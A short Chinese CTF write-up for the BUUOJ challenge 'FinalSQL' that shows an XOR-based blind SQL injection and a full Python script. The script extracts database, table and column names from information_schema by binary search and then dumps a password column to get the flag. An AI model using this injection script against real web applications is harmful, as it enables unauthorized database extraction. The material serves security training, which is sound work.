[极客大挑战 2019]FinalSQL

用异或来注入

注入语句为1是error，为0时为check

?id=1^(length(database())=5)

写盲注脚本
这道题有点坑，首先是表名有两个，一个特别想flag，还有一个就是需要多线程，但是由于是python的，也没有那么必要等一会就出来了

import requests

flag = ""
i = 0

while True:
    head = 127
    tail = 32
    i += 1

    while tail < head:
        mid = (head + tail) // 2
        # url = f"http://0781b439-5ece-442b-a082-731016be580f.node5.buuoj.cn:81/search.php?id=1^(ascii(substr((Select(group_concat(schema_name))from(information_schema.schemata)),{i},1))>{mid})--+"
        # url = f"http://0781b439-5ece-442b-a082-731016be580f.node5.buuoj.cn:81/search.php?id=1^(ascii(substr((Select(group_concat(table_name))from(information_schema.tables)where(table_schema='geek')),{i},1))>{mid})--+"
        # url = f"http://0781b439-5ece-442b-a082-731016be580f.node5.buuoj.cn:81/search.php?id=1^(ascii(substr((Select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),{i},1))>{mid})--+"
        url = f"http://3f5e5555-232e-48d1-bae5-64b59f257a76.node5.buuoj.cn:81/search.php?id=1^(ascii(substr((Select(group_concat(password))from(F1naI1y)),{i},1))>{mid})--+"

        r = requests.get(url=url)
        if 'ERROR' in r.text:
            tail = mid + 1
        else:
            head = mid

    if tail != 32:
        flag += chr(tail)

    else:
        break
    print(flag)